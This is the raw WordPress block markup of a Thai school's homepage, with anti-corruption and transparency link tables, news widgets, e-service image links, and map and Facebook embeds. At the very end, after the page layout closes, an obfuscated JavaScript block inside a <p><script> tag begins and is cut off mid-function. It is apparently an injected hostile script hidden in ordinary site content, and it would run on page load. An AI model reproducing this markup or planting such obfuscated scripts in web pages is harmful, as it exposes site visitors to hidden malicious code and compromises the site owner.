href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 